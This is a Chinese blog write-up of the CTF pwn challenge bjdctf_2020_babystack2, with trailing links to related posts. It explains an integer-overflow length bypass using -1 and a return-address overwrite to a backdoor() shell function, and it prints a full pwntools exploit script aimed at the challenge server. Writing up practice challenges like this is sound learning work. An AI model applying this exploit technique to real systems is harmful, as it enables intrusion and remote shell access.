bjdctf_2020_babystack2
2024-06-29 01:19:34
bjdctf_2020_babystack2
使用checksec查看:
只开启了栈不可执行。
先放进IDA中分析:
__isoc99_scanf("%d", &nbytes);:用户输入第二次输入的长度。read(0, &buf, (unsigned int)nbytes);:向变量buf内读取用户第一次输入长度大小的数据。
存在backdoor():
- 直接getshell,调用即可。
题目思路
- 用
-1绕过长度限制。 - 覆盖返回地址为
backdoor()的地址。
步骤解析
无需
完整exp
from pwn import *#start
r = remote("node4.buuoj.cn",27324)
# r = process("../buu/bjdctf_2020_babystack2")
elf = ELF("../buu/bjdctf_2020_babystack2")#params
backdoor_addr = elf.symbols['backdoor']#attack
r.recv()
r.sendline(b"-1")
r.recv()
payload = b'M'*(0x10+8) + p64(backdoor_addr)
r.sendline(payload)r.interactive()
bjdctf_2020_babystack2相关推荐
- [BUUCTF-pwn]——bjdctf_2020_babystack2
[BUUCTF-pwn]--bjdctf_2020_babystack2 题目地址: https://buuoj.cn/challenges#bjdctf_2020_babystack2 先check ...
- BUUCTF(pwn)bjdctf_2020_babystack2
这是一道整形溢出的题目 from pwn import * p = remote("node3.buuoj.cn",28786) flag=0x400726 p.sendlinea ...
- PWN-PRACTICE-BUUCTF-7
PWN-PRACTICE-BUUCTF-7 jarvisoj_fm ciscn_2019_s_3 SROP解法 ret2csu解法 bjdctf_2020_babystack2 [HarekazeCT ...
- 持续更新 BUUCTF——PWN(一)
文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...
- buuctf(pwn)
胖胖 pwn1_sctf_2016 ciscn_2019_n_11 补充movss /ucomiss jarvisoj_level0 ciscn_2019_c_1 babyrop [第五空间2019 ...
最新文章
- 投资83亿!“双一流”高校异地落户,传来新消息!
- 为应用程序池 ''DefaultAppPool'' 提供服务的进程意外终止。进程 ID 是 ''xxx''问题的解决方法...
- pycharm导入jieba包_3分钟带你搞懂Python模块、包的区别和使用
- [优先队列] 洛谷 P1631 序列合并
- mac vscode设置中文_VSCode编写latex
- 09. 用两个栈实现队列
- VSTS 2010体验 - TFS 2010变化巨大
- ubuntu 修改 ssh默认端口号
- Qt拖放操作和打印操作
- 修改win10注册表来控制cpu的最大运行频率,实现电脑降温
- Atitit golang开发环境搭建 目录 1. 编辑helo.go 1 1.1. 调试编译 1 2. Ide选择liteide 2 3. 问题解决 2 4. 附录 2 4.1. Go语言标准库常
- 微信公众号里面使用定位
- Python恶搞搞机程序弹窗
- Guest用户如何切换到administrator用户桌面
- 字节跳动面经(2020春招)
- 【精】Verilog语言缩写规范
- Python之 函数笔记
- AutoConfiguration排除指定和过滤自动配置组件
- C++无法在头文件中定义string类数据
- 星速平台:煤炭板块震荡上扬 昊华能源涨停